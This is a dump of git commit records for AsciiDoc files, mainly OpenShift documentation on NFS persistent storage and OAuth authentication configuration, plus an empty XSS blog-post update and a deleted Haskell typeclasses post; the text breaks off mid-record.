custom SCC, as described in\nlink:pod_security_context#scc-supplemental-groups[pod security and custom SCCs],\nis the preferred solution. A custom SCC can be created such that minimum and\nmaximum group IDs are defined, group ID range checking is enforced, and a group\nID of 5555 is allowed.\n\n[[nfs-user-ids]]\n=== User IDs\n\nUser IDs can be defined in the container image or in the pod definition. The\nfull link:pod_security_context.html#user-id[Volume Security] topic covers\ncontrolling storage access based on user IDs, and should be read prior to\nsetting up NFS persistent storage.\n\n[NOTE]\n====\nIt is generally preferable to use link:#nfs-supplemental-groups[supplemental\ngroup IDs] to gain access to persistent storage versus using user IDs.\n====\n\nIn the link:#nfs-export[example target NFS directory] shown above, the container\nneeds its UID set to 65534 (ignoring group IDs for the moment), so the following\ncan be added to the pod definition:\n\n====\n[source,yaml]\n----\nspec:\n containers: <1>\n - name:\n ...\n securityContext:\n runAsUser: 65534 <2>\n----\n<1> Pods contain a `*securtityContext*` specific to each container (shown here) and\na pod-level `*securityContext*` which applies to all containers defined in the pod.\n<2> 65534 is the *nfsnobody* user.\n====\n\nAssuming the *default* project and the *restricted* SCC, the pod's requested\nuser ID of 65534 will, unfortunately, not be allowed, and therefore the pod will\nfail. The pod fails because of the following:\n\n- It requests 65534 as its user ID.\n- All SCCs available to the pod are examined to see which SCC will allow a user ID\nof 65534 (actually, all policies of the SCCs are checked but the focus here is\non user ID).\n- Because all available SCCs use *MustRunAsRange* for their `*runAsUser*`\nstrategy, UID range checking is required.\n- 65534 is not included in the SCC or project's user ID range.\n\nIt is generally considered a good practice not to modify the predefined SCCs.\nThe preferred way to fix this situation is to create a custom SCC, as described\nin the full link:pod_security_context.html#scc-runasuser[Volume Security] topic.\nA custom SCC can be created such that minimum and maximum user IDs are defined,\nUID range checking is still enforced, and the UID of 65534 will be allowed.\n\n[[nfs-selinux]]\n=== SELinux\n\n[NOTE]\n====\nSee the full link:pod_security_context.html#volsec-selinux[Volume Security]\ntopic for information on controlling storage access in conjunction with using\nSELinux.\n====\n\nBy default, SELinux does not allow writing from a pod to a remote NFS server.\nThe NFS volume mounts correctly, but is read-only.\n\nTo enable writing to NFS volumes with SELinux enforcing on each node, run:\n\n----\n# setsebool -P virt_use_nfs 1\n# setsebool -P virt_sandbox_use_nfs 1\n----\n\nThe `-P` option above makes the bool persistent between reboots.\n\nThe *virt_use_nfs* boolean is defined by the *_docker-selinux_* package. If an\nerror is seen indicating that this bool is not defined, ensure this package has\nbeen installed.\n\n[[nfs-export-settings]]\n=== Export Settings\n\nIn order to enable arbitrary container users to read and write the volume, each\nexported volume on the NFS server should conform to the following conditions:\n\n- Each export must be:\n+\n----\n\/<example_fs> *(rw,root_squash)\n----\n- The firewall must be configured to allow traffic to the mount point. For NFSv4,\nthe default port is 2049 (*nfs*). For NFSv3, there are three ports to configure:\n2049 (*nfs*), 20048 (*mountd*), and 111 (*portmapper*).\n+\n.NFSv4\n----\n# iptables -I INPUT 1 -p tcp --dport 2049 -j ACCEPT\n----\n+\n.NFSv3\n----\n# iptables -I INPUT 1 -p tcp --dport 2049 -j ACCEPT\n# iptables -I INPUT 1 -p tcp --dport 20048 -j ACCEPT\n# iptables -I INPUT 1 -p tcp --dport 111 -j ACCEPT\n----\n- The NFS export and directory must be set up so that it is accessible by the\ntarget pods. Either set the export to be owned by the container's primary UID,\nor supply the pod group access using `*suppplementalGroups*`, as shown in\nlink:#nfs-supplemental-groups[Group IDs] above. See the full\nlink:pod_security_context.html[Volume Security] topic for additional pod\nsecurity information as well.\n\n[[nfs-reclaiming-resources]]\n== Reclaiming Resources\nNFS implements the OpenShift *Recyclable* plug-in interface. Automatic\nprocesses handle reclamation tasks based on policies set on each persistent\nvolume.\n\nBy default, persistent volumes are set to *Retain*. NFS volumes which are set to\n*Recycle* are scrubbed (i.e., `rm -rf` is run on the volume) after being\nreleased from their claim (i.e, after the user's `*PersistentVolumeClaim*` bound\nto the volume is deleted). Once recycled, the NFS volume can be bound to a new\nclaim.\n\n[[nfs-automation]]\n== Automation\nClusters can be provisioned with persistent storage using NFS in the following\nways:\n\n- link:#nfs-enforcing-disk-quotas[Enforce storage quotas] using disk partitions.\n- Enforce security by link:#nfs-volume-security[restricting volumes] to the\nproject that has a claim to them.\n- Configure link:#nfs-reclaiming-resources[reclamation of discarded resources] for\neach PV.\n\nThey are many ways that you can use scripts to automate the above tasks. You can\nuse an\nlink:https:\/\/github.com\/openshift\/openshift-ansible\/tree\/master\/roles\/kube_nfs_volumes[example\nAnsible playbook] to help you get started.\n\n[[nfs-additional-config-and-troubleshooting]]\n== Additional Configuration and Troubleshooting\n\nDepending on what version of NFS is being used and how it is configured, there\nmay be additional configuration steps needed for proper export and security\nmapping. The following are some that may apply:\n\n[cols=\"1,2\"]\n|====\n\n|NFSv4 mount incorrectly shows all files with ownership of *nobody:nobody*\na|- Could be attributed to the ID mapping settings (\/etc\/idmapd.conf) on your NFS\n- See https:\/\/access.redhat.com\/solutions\/33455[this Red Hat Solution].\n\n|Disabling ID mapping on NFSv4\na|- On both the NFS client and server, run:\n+\n----\n# echo 'Y' > \/sys\/module\/nfsd\/parameters\/nfs4_disable_idmapping\n----\n|====\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f383bc509adafa5683b4293c86605ff431252ee9","subject":"Update 2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","message":"Update 2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","new_file":"_posts\/2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"mit","lang":"AsciiDoc"} {"commit":"933d2bebd25a476d7e9c890435db648f7263a443","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"mit","lang":"AsciiDoc"} {"commit":"b3b7c567140cf93aa5bdfd0280e299dcc3bd3111","subject":"Delete the file at '_posts\/2017-05-21-Typeclasses-in-haskell.adoc'","message":"Delete the file at '_posts\/2017-05-21-Typeclasses-in-haskell.adoc'","repos":"seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io","old_file":"_posts\/2017-05-21-Typeclasses-in-haskell.adoc","new_file":"_posts\/2017-05-21-Typeclasses-in-haskell.adoc","new_contents":"","old_contents":"\/\/ = Your Blog title\n\/\/ See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase\/content\/ for information about the parameters.\n\/\/ :hp-image: \/covers\/cover.png\n\/\/ :published_at: 2019-01-31\n\/\/ :hp-tags: HubPress, Blog, Open_Source,\n\/\/ :hp-alt-title: My English Title\n\n\n= Typeclasses in haskell\n\n. You can think of them kind of as Java interface and unlike classes in OOP\n. What's the type signature of the `==` function?\n+\n[source,shell session]\n----\nghci> :t (==)\n(==) :: (Eq a) => a -> a -> Bool\n\/\/`=>` class constraint\n----\n. Eq, Ord, Show, Read, Enum, Bounded, Num, Integral, Floating\n. CHCI could infer what kind of result we wanted out of read.\n+\n[source,shell session]\n----\nghci> read \"4\" \n<interactive>:1:0: \n Ambiguous type variable `a' in the constraint: \n `Read a' arising from a use of `read' at <interactive>:1:0-7 \n Probable fix: add a type signature that fixes these type variable(s)\n \nghci> read \"5\" :: Int\n5\nit :: Int\n\nghci> [1 .. 5]\n[1,2,3,4,5]\nit :: (Enum t, Num t) => [t]\nghci> succ 'b'\n'c'\nit :: Char\nghci> pred 'b'\n'a'\nit :: Char\n\nghci> maxBound :: Char\n'\\1114111'\nit :: Char\n----\n. In this case, we can use explicit *Type annotations* by adding `::` refer to above\n. \uac1d\uccb4\uc9c0\ud5a5\uc5b8\uc5b4\uc5d0 \ud074\ub798\uc2a4\ub4e4\uacfc \ud0c0\uc785\ud074\ub798\uc2a4\ub294 \ub2e4\ub974\ub2e4, \uc624\ud788\ub824 \uc790\ubc14\uc5d0 \uc778\ud130\ud398\uc774\uc2a4 \uc815\ub3c4\ub85c \uc0dd\uac01\ub428\n. \ud0c0\uc785\ucd94\ub860\uc774 \ud56d\uc0c1 \uc798 \ub420\uaebc\ub77c\ub294 \uac00\uc815\uc740 \uc811\uc5b4\ub450\uc2dc\uae38\n\n## Reference\nhttp:\/\/learnyouahaskell.com\/types-and-typeclasses","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"5b36e17e713f3af72946ff5ffaf9d7fe8d11e525","subject":"Update default access token lifetime to 1 day","message":"Update default access token lifetime to 1 day\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"architecture\/authentication.adoc","new_file":"architecture\/authentication.adoc","new_contents":"= Authentication\n{product-author}\n{product-version}\n:data-uri:\n:icons:\n:experimental:\n:toc: macro\n:toc-title: \n\ntoc::[]\n\n== Overview\n\nThe authentication layer is responsible for identifying the user associated with requests to the OpenShift API. Information about the requesting user is then used by the authorization layer to determine whether the request should be allowed.\n\n== API Authentication\n\nRequests to the OpenShift API are authenticated using the following methods:\n\n* OAuth Access Tokens\n** Obtained from the OpenShift OAuth server using the `<master>\/oauth\/authorize` and `<master>\/oauth\/token` endpoints\n** Sent as an \"Authorization: Bearer …\" header or an \"access_token=…\" query parameter\n* X.509 Client Certificates\n** Requires a https connection to the API server\n** Verified by the API server against a trusted certificate authority bundle\n** The API server creates and distributes certificates to controllers to authenticate themselves\n\nAny request with an invalid access token or an invalid certificate is rejected by the authentication layer with a 401 error.\n\nIf no access token or certificate is presented, the authentication layer assigns the `system:anonymous` user and the `system:unauthenticated` group to the request. This allows the authorization layer to determine which requests (if any) an anonymous user is allowed to make.\n\n== OAuth overview\n\nThe OpenShift master includes a built-in OAuth server. End-users obtain OAuth access tokens to authenticate themselves to the API.\n\nWhen a person requests a new OAuth token, the OAuth server uses the configured identity provider(s) to determine the identity of the person making the request.\n\nIt then determines what user that identity maps to, creates an access token for that user, and returns the token for use.\n\n=== OAuth clients\n\nEvery request for an OAuth token must specify the OAuth client which will receive and use the token. The following OAuth clients are automatically created when starting the OpenShift API:\n\n * `openshift-web-console`: used to request tokens for the web console\n * `openshift-browser-client`: used to request tokens at `<master>\/oauth\/token\/request` with a user-agent that can handle interactive logins\n * `openshift-challenging-client`: used to request tokens with a user-agent that can handle `WWW-Authenticate` challenges\n\nTo register additional clients:\n====\n----\nosc create -f <(echo '\n{\n \"kind\": \"OAuthClient\",\n \"version\": \"v1beta1\",\n \"metadata\": {\n \"name\":\"demo\" <1>\n },\n \"secret\": \"...\", <2>\n \"redirectURIs\": [\n \"http:\/\/www.example.com\/\" <3>\n ]\n}')\n----\n<1> The `name` of the OAuth client is used as the `client_id` parameter when making requests to `<master>\/oauth\/authorize` and `<master>\/oauth\/token`.\n<2> The `secret` is used as the `client_secret` parameter when making requests to `<master>\/oauth\/token`.\n<3> The `redirect_uri` parameter specified in requests to `<master>\/oauth\/authorize` and `<master>\/oauth\/token` must be equal to (or prefixed by) one of the URIs in `redirectURIs`.\n====\n\n=== Integrations\n\nAll requests for OAuth tokens involve a request to `<master>\/oauth\/authorize`. Most authentication integrations will place an authenticating proxy in front of this endpoint, or configure OpenShift to validate credentials against a backing identity provider.\n\nBecause requests to `<master>\/oauth\/authorize` can come from user-agents that cannot display interactive login pages (like `osc`), authenticating using a `WWW-Authenticate` challenge is supported in addition to interactive login flows.\n\nIf an authenticating proxy is placed in front of the `<master>\/oauth\/authorize` endpoint, it should send unauthenticated non-browser user-agents `WWW-Authenticate` challenges, rather than displaying an interactive login page or redirecting to an interactive login flow.\n\nIf the authenticating proxy cannot support `WWW-Authenticate` challenges (or if OpenShift is configured to use an identity provider that does not support WWW-Authenticate challenges), users can visit `<master>\/oauth\/token\/request` using a browser to obtain an access token manually.\n\n== OAuth configuration\n\nOAuth configuration is specified in the master config file.\n\nWhen running without a master config file, the `AllowAllPasswordIdentityProvider` identity provider is used, which allows any non-empty username and password to log in. This is useful for test purposes.\n\nTo use other identity providers, you must run from a config file. For more information about creating and running from config files, see link:..\/using_openshift\/master_node_configuration.html[Master and Node Configuration].\n\n=== Identity providers\n\n==== Allow All [[AllowAllPasswordIdentityProvider]]\n\n`AllowAllPasswordIdentityProvider` allows any non-empty login and password. This is the default identity provider when running OpenShift without a config file.\n\nMaster config:\n====\n----\noauthConfig:\n ...\n identityProviders:\n - name: my_allow_provider <1>\n challenge: true <2>\n login: true <3>\n provider:\n apiVersion: v1\n kind: AllowAllPasswordIdentityProvider\n----\n<1> This provider name is prefixed to logins to form an identity name.\n<2> When `true`, unauthenticated token requests from non-web clients (like `osc`) will be sent a WWW-Authenticate challenge header for this provider.\n<3> When `true`, unauthenticated token requests from web clients (like the web console) will be redirected to a login page backed by this provider.\n====\n\n==== Deny All [[DenyAllPasswordIdentityProvider]]\n\n`DenyAllPasswordIdentityProvider` denies all username and passwords.\n\nMaster config:\n====\n----\noauthConfig:\n ...\n identityProviders:\n - name: my_deny_provider <1>\n challenge: true <2>\n login: true <3>\n provider:\n apiVersion: v1\n kind: DenyAllPasswordIdentityProvider\n----\n<1> This provider name is prefixed to logins to form an identity name.\n<2> When `true`, unauthenticated token requests from non-web clients (like `osc`) will be sent a WWW-Authenticate challenge header for this provider.\n<3> When `true`, unauthenticated token requests from web clients (like the web console) will be redirected to a login page backed by this provider.\n====\n\n==== HTPasswd [[HTPasswdPasswordIdentityProvider]]\n\n`HTPasswdPasswordIdentityProvider` validates logins and passwords against a flat-file generated using http:\/\/httpd.apache.org\/docs\/2.4\/programs\/htpasswd.html[htpasswd]\n\n* Only MD5 and SHA encryption types are supported. MD5 encryption is recommended, and is the default for htpasswd. Plaintext, crypt, and bcrypt hashes are not currently supported.\n* The file is re-read if its modification time changes, without requiring a server restart\n* To create the file: `htpasswd -c <\/path\/to\/users.htpasswd> <login>`\n* To add or update a login to the file: `htpasswd <\/path\/to\/users.htpasswd> <login>`\n* To remove a login from the file: `htpasswd <\/path\/to\/users.htpasswd> -D <login>`\n\nMaster config:\n====\n----\noauthConfig:\n ...\n identityProviders:\n - name: my_htpasswd_provider <1>\n challenge: true <2>\n login: true <3>\n provider:\n apiVersion: v1\n kind: HTPasswdPasswordIdentityProvider\n file: \/path\/to\/users.htpasswd <4>\n----\n<1> This provider name is prefixed to logins to form an identity name.\n<2> When `true`, unauthenticated token requests from non-web clients (like `osc`) will be sent a WWW-Authenticate challenge header for this provider.\n<3> When `true`, unauthenticated token requests from web clients (like the web console) will be redirected to a login page backed by this provider.\n<4> File generated using http:\/\/httpd.apache.org\/docs\/2.4\/programs\/htpasswd.html[htpasswd].\n====\n\n==== Basic-Auth (remote) [[BasicAuthPasswordIdentityProvider]]\n\n`BasicAuthPasswordIdentityProvider` validates logins and passwords against a remote server using a server-to-server basic-auth request.\n\n* Logins and passwords are validated against a basic-auth protected, JSON-returning remote URL\n* A 401 response indicates failed auth.\n* A non-200 status, or the presence of a non-empty \"error\" key, indicates an error: `{\"error\":\"Error message\"}`\n* A 200 status with an \"id\" key indicates success: `{\"id\":\"userid\"}`\n** The id must be unique to the authenticated user\n** The id must not be able to be modified\n* A successful response may optionally provide additional data:\n** Display name. Example: `{\"id\":\"userid\", \"name\": \"User Name\", ...}`\n** Email address. Example: `{\"id\":\"userid\", \"email\":\"user@example.com\", ...}`\n** Preferred login. This is useful when the unique, unchangeable user id is a database key or UID, and a more human-readable name exists. This is used as a hint when provisioning the OpenShift user for the authenticated identity. Example: `{\"id\":\"014fbff9a07c\", \"login\":\"bob\", ...}`\n\nMaster config:\n====\n----\noauthConfig:\n ...\n identityProviders:\n - name: my_remote_basic_auth_provider <1>\n challenge: true <2>\n login: true <3>\n provider:\n apiVersion: v1\n kind: BasicAuthPasswordIdentityProvider\n url: https:\/\/www.example.com\/remote-idp <4>\n ca: \/path\/to\/ca.file <5>\n certFile: \/path\/to\/client.crt <6>\n keyFile: \/path\/to\/client.key <7>\n----\n<1> This provider name is prefixed to the returned user id to form an identity name.\n<2> When `true`, unauthenticated token requests from non-web clients (like `osc`) will be sent a WWW-Authenticate challenge header for this provider.\n<3> When `true`, unauthenticated token requests from web clients (like the web console) will be redirected to a login page backed by this provider.\n<4> URL accepting credentials in basic-auth headers.\n<5> Certificate bundle to use to validate server certificates for the configured URL. Optional.\n<6> Client certificate to present when making requests to the configured URL. Optional.\n<7> Key for the client certificate. Required if `certFile` is specified.\n====\n\n==== Request Header [[RequestHeaderIdentityProvider]]\n\n`RequestHeaderIdentityProvider` identifies users from request header values, like `X-Remote-User`. It is typically used in combination with an authenticating proxy, which sets the request header value.\n\nMaster config:\n====\n----\noauthConfig:\n ...\n identityProviders:\n - name: my_request_header_provider <1>\n challenge: false <2>\n login: false <3>\n provider:\n apiVersion: v1\n kind: RequestHeaderIdentityProvider\n clientCA: \/path\/to\/client-ca.file <4>\n headers: <5>\n - X-Remote-User\n - SSO-User\n----\n<1> This provider name is prefixed to the user id in the request header to form an identity name.\n<2> `RequestHeaderIdentityProvider` cannot be used to send WWW-Authenticate challenges.\n<3> `RequestHeaderIdentityProvider` cannot be used to back a login page.\n<4> PEM-encoded certificate bundle. If set, a valid client certificate must be presented and validated against the certificate authorities in the specified file before the request headers are checked for usernames. Optional.\n<5> Header names to check, in order, for user ids. The first header containing a value is used as the user id. Required, case-insensitive.\n====\n\n==== GitHub [[GitHub]]\n\n`GitHubIdentityProvider` uses GitHub as an identity provider, using the OAuth integration.\n\nNote that using GitHub as an identity provider requires users to get a token using `<master>\/oauth\/token\/request` to use with command-line tools.\n\nMaster config:\n====\n----\noauthConfig:\n ...\n identityProviders:\n - name: github <1>\n challenge: false <2>\n login: true <3>\n provider:\n apiVersion: v1\n kind: GitHubIdentityProvider\n clientID: ... <4>\n clientSecret: ... <5>\n----\n<1> This provider name is prefixed to the GitHub numeric user id to form an identity name. It is also used to build the callback URL.\n<2> `GitHubIdentityProvider` cannot be used to send WWW-Authenticate challenges.\n<3> When `true`, unauthenticated token requests from web clients (like the web console) will be redirected to GitHub to log in.\n<4> The client id of a link:https:\/\/github.com\/settings\/applications\/new[registered GitHub OAuth application]. The application must be configured with a callback URL of `<master>\/oauth2callback\/<identityProviderName>`\n<5> The client secret issued by GitHub.\n====\n\n==== Google [[Google]]\n\n`GoogleIdentityProvider` uses Google as an identity provider, using Google's OpenID Connect integration.\n\nSee https:\/\/developers.google.com\/identity\/protocols\/OpenIDConnect for more information.\n\nNote that using Google as an identity provider requires users to get a token using `<master>\/oauth\/token\/request` to use with command-line tools.\n\nMaster config:\n====\n----\noauthConfig:\n ...\n identityProviders:\n - name: google <1>\n challenge: false <2>\n login: true <3>\n provider:\n apiVersion: v1\n kind: GoogleIdentityProvider\n clientID: ... <4>\n clientSecret: ... <5>\n----\n<1> This provider name is prefixed to the Google numeric user id to form an identity name. It is also used to build the redirect URL.\n<2> `GoogleIdentityProvider` cannot be used to send WWW-Authenticate challenges.\n<3> When `true`, unauthenticated token requests from web clients (like the web console) will be redirected to Google to log in.\n<4> The client id of a link:https:\/\/console.developers.google.com\/[registered Google project]. The project must be configured with a redirect URI of `<master>\/oauth2callback\/<identityProviderName>`\n<5> The client secret issued by Google.\n====\n\n==== OpenID Connect [[OpenID]]\n\n`OpenIDIdentityProvider` integrates with an OpenID Connect identity provider, using an link:http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#CodeFlowAuth[Authorization Code Flow].\n\nID Token and UserInfo decryption is not supported.\n\nBy default, the `openid` scope is requested. Extra scopes (if needed) can be specified in the `extraScopes` config field.\n\nClaims are read from the JWT `id_token` returned from the OpenID identity provider (and from the JSON returned by the `UserInfo` URL, if specified).\n\nAt least one claim must be configured as the claim to use as the user's identity. The link:http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#StandardClaims[standard identity claim] is `sub`.\n\nYou can also indicate which claims to use as the user's preferred username, display name, and email address. If multiple claims are specified, the first one with a non-empty value is used. The link:http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#StandardClaims[standard claims] are:\n\n* `sub` (used as the user identity)\n* `preferred_username` (used as the preferred user name when provisioning a user)\n* `email` (email address)\n* `name` (display name)\n\nNote that using an OpenID Connect identity provider requires users to get a token using `<master>\/oauth\/token\/request` to use with command-line tools.\n\nStandard config:\n====\n----\noauthConfig:\n ...\n identityProviders:\n - name: my_openid_connect <1>\n challenge: false <2>\n login: true <3>\n provider:\n apiVersion: v1\n kind: OpenIDIdentityProvider\n clientID: ... <4>\n clientSecret: ... <5>\n claims:\n id:\n - sub <6>\n preferredUsername:\n - preferred_username\n name:\n - name\n email:\n - email\n urls:\n authorize: https:\/\/myidp.example.com\/oauth2\/authorize <7>\n token: https:\/\/myidp.example.com\/oauth2\/token <8>\n----\n<1> This provider name is prefixed to the value of the identity claim to form an identity name. It is also used to build the redirect URL.\n<2> `OpenIDIdentityProvider` cannot be used to send WWW-Authenticate challenges.\n<3> When `true`, unauthenticated token requests from web clients (like the web console) will be redirected to the authorize URL to log in.\n<4> The client id of a client registered with the OpenID provider. The client must be allowed to redirect to `<master>\/oauth2callback\/<identityProviderName>`\n<5> The client secret.\n<6> Use the value of the `sub` claim in the returned `id_token` as the user's identity.\n<7> link:http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#AuthorizationEndpoint[Authorization Endpoint] described in the OpenID spec. Must use https.\n<8> link:http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#TokenEndpoint[Token Endpoint] described in the OpenID spec. Must use https.\n====\n\nA custom certificate bundle, extra scopes, and UserInfo URL can also be specified.\n\nFull config:\n====\n----\noauthConfig:\n ...\n identityProviders:\n - name: my_openid_connect\n challenge: false\n login: true\n provider:\n apiVersion: v1\n kind: OpenIDIdentityProvider\n clientID: ...\n clientSecret: ...\n ca: my-openid-ca-bundle.crt <1>\n extraScopes: <2>\n - email\n - profile\n claims:\n id: <3>\n - custom_id_claim\n - sub\n preferredUsername: <4>\n - preferred_username\n - email\n name: <5>\n - nickname\n - given_name\n - name\n email: <6>\n - custom_email_claim\n - email\n urls:\n authorize: https:\/\/myidp.example.com\/oauth2\/authorize\n token: https:\/\/myidp.example.com\/oauth2\/token\n userInfo: https:\/\/myidp.example.com\/oauth2\/userinfo <7>\n----\n<1> Certificate bundle to use to validate server certificates for the configured URLs. If empty, system trusted roots are used.\n<2> List of scopes to request (in addition to the `openid` scope) during the authorization request.\n<3> List of claims to use as the identity. First non-empty claim is used. At least one claim is required. If none of the listed claims have a value, authentication will fail.\n<4> List of claims to use as the preferred username when provisioning a user for this identity. First non-empty claim is used.\n<5> List of claims to use as the display name. First non-empty claim is used.\n<6> List of claims to use as the email address. First non-empty claim is used.\n<7> link:http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#UserInfo[UserInfo Endpoint] described in the OpenID spec. Must use https.\n====\n\n=== Token options\n\nThe OAuth server generates two kinds of tokens. \n\nAuthorize codes are short-lived tokens whose only use is to be exchanged for an access token. Set `authorizeTokenMaxAgeSeconds` to control the lifetime of authorize codes. The default lifetime is 5 minutes.\n\nAccess tokens are longer-lived tokens that grant access to the API. Set `accessTokenMaxAgeSeconds` to control the lifetime of access tokens. The default lifetime is 24 hours.\n\nMaster config:\n----\noauthConfig:\n ...\n tokenConfig:\n accessTokenMaxAgeSeconds: 86400\n authorizeTokenMaxAgeSeconds: 300\n----\n\n=== Grant options\n\nTo configure how the OAuth server responds to token requests for a client the user has not previously granted permission, set the `method` value in the `grantConfig` stanza. Valid values are:\n\n* `auto`\n** Auto-approve the grant and retry the request\n* `prompt`\n** Prompt the user to approve or deny the grant\n* `deny`\n** Auto-deny the grant and return a failure error to the client\n\nMaster config:\n----\noauthConfig:\n ...\n grantConfig:\n method: auto\n----\n\n=== Session options\n\nThe OAuth server uses a signed and encrypted cookie-based session during login and redirect flows.\n\nIf no `sessionSecretsFile` is specified, a random signing and encryption secret is generated at each start of the master server. This means that any logins in progress will have their sessions invalidated if the master is restarted. It also means that if multiple masters are configured, they will not be able to decode sessions generated by one of the other masters.\n\nTo specify the signing and encryption secret to use, specify a `sessionSecretsFile`. This allows you separate secret values from the config file, and keep the config file distributable for debugging, etc.\n\nMaster config:\n====\n----\noauthConfig:\n ...\n sessionConfig:\n sessionMaxAgeSeconds: 300 <1>\n sessionName: ssn <2>\n sessionSecretsFile: \"...\" <3>\n----\n<1> Controls the maximum age of a session (sessions auto-expire once a token request is complete). If auto-grant is not enabled, sessions must last as long as the user is expected to take to approve or reject a client authorization request.\n<2> Name of the cookie used to store the session.\n<3> Filename containing serialized SessionSecrets object. If empty, a random signing and encryption secret is generated at each server start.\n====\n\nMultiple secrets can be specified in the `sessionSecretsFile` to enable rotation. New sessions are signed and encrypted using the first secret in the list. Existing sessions are decrypted\/authenticated by each secret until one succeeds.\n\nSession secret config:\n====\n----\napiVersion: v1\nkind: SessionSecrets\nsecrets: <1>\n- authentication: \"...\" <2>\n encryption: \"...\" <3>\n- authentication: \"...\"\n encryption: \"...\"\n...\n----\n<1> List of secrets used to authenticate and encrypt cookie sessions. At least one secret must be specified. Each secret must set an authentication and encryption secret.\n<2> Signing secret, used to authenticate sessions using HMAC. Recommended to use a secret with 32 or 64 bytes.\n<3> Encrypting secret, used to encrypt sessions. Must be 16, 24, or 32 characters long, to select AES-128, AES-192, or AES-256.\n====","old_contents":"= Authentication\n{product-author}\n{product-version}\n:data-uri:\n:icons:\n:experimental:\n:toc: macro\n:toc-title: \n\ntoc::[]\n\n== Overview\n\nThe authentication layer is responsible for identifying the user associated with requests to the OpenShift API. Information about the requesting user is then used by the authorization layer to determine whether the request should be allowed.\n\n== API Authentication\n\nRequests to the OpenShift API are authenticated using the following methods:\n\n* OAuth Access Tokens\n** Obtained from the OpenShift OAuth server using the `<master>\/oauth\/authorize` and `<master>\/oauth\/token` endpoints\n** Sent as an \"Authorization: Bearer …\" header or an \"access_token=…\" query parameter\n* X.509 Client Certificates\n** Requires a https connection to the API server\n** Verified by the API server against a trusted certificate authority bundle\n** The API server creates and distributes certificates to controllers to authenticate themselves\n\nAny request with an invalid access token or an invalid certificate is rejected by the authentication layer with a 401 error.\n\nIf no access token or certificate is presented, the authentication layer assigns the `system:anonymous` user and the `system:unauthenticated` group to the request. This allows the authorization layer to determine which requests (if any) an anonymous user is allowed to make.\n\n== OAuth overview\n\nThe OpenShift master includes a built-in OAuth server. End-users obtain OAuth access tokens to authenticate themselves to the API.\n\nWhen a person requests a new OAuth token, the OAuth server uses the configured identity provider(s) to determine the identity of the person making the request.\n\nIt then determines what user that identity maps to, creates an access token for that user, and returns the token for use.\n\n=== OAuth clients\n\nEvery request for an OAuth token must specify the OAuth client which will receive and use the token. The following OAuth clients are automatically created when starting the OpenShift API:\n\n * `openshift-web-console`: used to request tokens for the web console\n * `openshift-browser-client`: used to request tokens at `<master>\/oauth\/token\/request` with a user-agent that can handle interactive logins\n * `openshift-challenging-client`: used to request tokens with a user-agent that can handle `WWW-Authenticate` challenges\n\nTo register additional clients:\n====\n----\nosc create -f <(echo '\n{\n \"kind\": \"OAuthClient\",\n \"version\": \"v1beta1\",\n \"metadata\": {\n \"name\":\"demo\" <1>\n },\n \"secret\": \"...\", <2>\n \"redirectURIs\": [\n \"http:\/\/www.example.com\/\" <3>\n ]\n}')\n----\n<1> The `name` of the OAuth client is used as the `client_id` parameter when making requests to `<master>\/oauth\/authorize` and `<master>\/oauth\/token`.\n<2> The `secret` is used as the `client_secret` parameter when making requests to `<master>\/oauth\/token`.\n<3> The `redirect_uri` parameter specified in requests to `<master>\/oauth\/authorize` and `<master>\/oauth\/token` must be equal to (or prefixed by) one of the URIs in `redirectURIs`.\n====\n\n=== Integrations\n\nAll requests for OAuth tokens involve a request to `<master>\/oauth\/authorize`. Most authentication integrations will place an authenticating proxy in front of this endpoint, or configure OpenShift to validate credentials against a backing identity provider.\n\nBecause requests to `<master>\/oauth\/authorize` can come from user-agents that cannot display interactive login pages (like `osc`), authenticating using a `WWW-Authenticate` challenge is supported in addition to interactive login flows.\n\nIf an authenticating proxy is placed in front of the `<master>\/oauth\/authorize` endpoint, it should send unauthenticated non-browser user-agents `WWW-Authenticate` challenges, rather than displaying an interactive login page or redirecting to an interactive login flow.\n\nIf the authenticating proxy cannot support `WWW-Authenticate` challenges (or if OpenShift is configured to use an identity provider that does not support WWW-Authenticate challenges), users can visit `<master>\/oauth\/token\/request` using a browser to obtain an access token manually.\n\n== OAuth configuration\n\nOAuth configuration is specified in the master config file.\n\nWhen running without a master config file, the `AllowAllPasswordIdentityProvider` identity provider is used, which allows any non-empty username and password to log in. This is useful for test purposes.\n\nTo use other identity providers, you must run from a config file. For more information about creating and running from config files, see link:..\/using_openshift\/master_node_configuration.html[Master and Node Configuration].\n\n=== Identity providers\n\n==== Allow All [[AllowAllPasswordIdentityProvider]]\n\n`AllowAllPasswordIdentityProvider` allows any non-empty login and password. This is the default identity provider when running OpenShift without a config file.\n\nMaster config:\n====\n----\noauthConfig:\n ...\n identityProviders:\n - name: my_allow_provider <1>\n challenge: true <2>\n login: true <3>\n provider:\n apiVersion: v1\n kind: AllowAllPasswordIdentityProvider\n----\n<1> This provider name is prefixed to logins to form an identity name.\n<2> When `true`, unauthenticated token requests from non-web clients (like `osc`) will be 